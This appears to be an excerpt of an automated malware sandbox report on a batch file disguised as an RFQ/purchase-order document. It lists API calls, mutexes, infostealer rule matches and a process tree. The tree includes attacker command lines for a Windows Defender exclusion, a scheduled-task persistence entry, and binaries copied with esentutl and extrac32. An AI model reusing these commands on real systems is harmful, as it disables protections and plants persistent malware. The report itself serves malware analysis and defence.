Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E58400 NtReadVirtualMemory,	4_2_02E58400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E57A2C NtAllocateVirtualMemory,	4_2_02E57A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02E5DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02E5DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E58D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02E58D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02E5DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E57D78 NtWriteVirtualMemory,	4_2_02E57D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E57A2A NtAllocateVirtualMemory,	4_2_02E57A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02E5DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E58D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02E58D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F38670 NtUnmapViewOfSection,	26_2_02F38670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F38400 NtReadVirtualMemory,	26_2_02F38400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F37A2C NtAllocateVirtualMemory,	26_2_02F37A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F38D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	26_2_02F38D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F3DD70 NtOpenFile,NtReadFile,NtClose,	26_2_02F3DD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F37D78 NtWriteVirtualMemory,	26_2_02F37D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F386F7 NtUnmapViewOfSection,	26_2_02F386F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F37AC9 NtAllocateVirtualMemory,	26_2_02F37AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F37A2A NtAllocateVirtualMemory,	26_2_02F37A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F38D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	26_2_02F38D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF8670 NtUnmapViewOfSection,	32_2_02EF8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF8400 NtReadVirtualMemory,	32_2_02EF8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF7A2C NtAllocateVirtualMemory,	32_2_02EF7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF7D78 NtWriteVirtualMemory,	32_2_02EF7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	32_2_02EF8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EFDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	32_2_02EFDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF86F7 NtUnmapViewOfSection,	32_2_02EF86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF7A2A NtAllocateVirtualMemory,	32_2_02EF7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EFDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	32_2_02EFDBB0
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EFDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	32_2_02EFDC8C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EFDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	32_2_02EFDC04
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EF8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	32_2_02EF8D6E

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E5F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

4_2_02E5F7C8

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E420C4	4_2_02E420C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_0121AA42	13_2_0121AA42
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_0121EA80	13_2_0121EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_01214A98	13_2_01214A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_0121DF00	13_2_0121DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_01213E80	13_2_01213E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_012141C8	13_2_012141C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_0121DF00	13_2_0121DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A956B8	13_2_06A956B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A966E8	13_2_06A966E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A9C2A0	13_2_06A9C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A9B32A	13_2_06A9B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A93178	13_2_06A93178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A97E78	13_2_06A97E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A97798	13_2_06A97798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A9E4C0	13_2_06A9E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A92350	13_2_06A92350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A90040	13_2_06A90040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A95DDF	13_2_06A95DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06A90006	13_2_06A90006
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 14_2_009885B7	14_2_009885B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 14_2_009885C8	14_2_009885C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_0499B490	16_2_0499B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_0499B470	16_2_0499B470
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065EDAAC	20_2_065EDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065E1B94	20_2_065E1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065EE608	20_2_065EE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065E25B8	20_2_065E25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065E25A8	20_2_065E25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065E4174	20_2_065E4174
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065E1D20	20_2_065E1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065E1B88	20_2_065E1B88
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_06663360	20_2_06663360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 26_2_02F220C4	26_2_02F220C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_011641C8	29_2_011641C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_01164A98	29_2_01164A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0116EA80	29_2_0116EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0116DF00	29_2_0116DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_01163E80	29_2_01163E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0116DF00	29_2_0116DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0116A988	29_2_0116A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_069256B8	29_2_069256B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_069266E8	29_2_069266E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06927E78	29_2_06927E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0692C2A0	29_2_0692C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0692B32A	29_2_0692B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06923178	29_2_06923178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06927798	29_2_06927798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_0692E4C0	29_2_0692E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06925DDF	29_2_06925DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06922350	29_2_06922350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06920040	29_2_06920040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 29_2_06920006	29_2_06920006
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 32_2_02EE20C4	32_2_02EE20C4

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02E44860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02E44500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02E444DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02E5894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02E589D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02E446D4 appears 244 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02F24860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02F3894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02F246D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02EF894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02EE46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02EE4860 appears 683 times

Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: armsvc.exe.12.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.12.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winBAT@55/27@3/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E47FD4 GetDiskFreeSpaceA,

4_2_02E47FD4

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E56DC8 CoCreateInstance,

4_2_02E56DC8

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477cd68e75b-b

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB08060.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

ReversingLabs: Detection: 23%

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_12-258

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
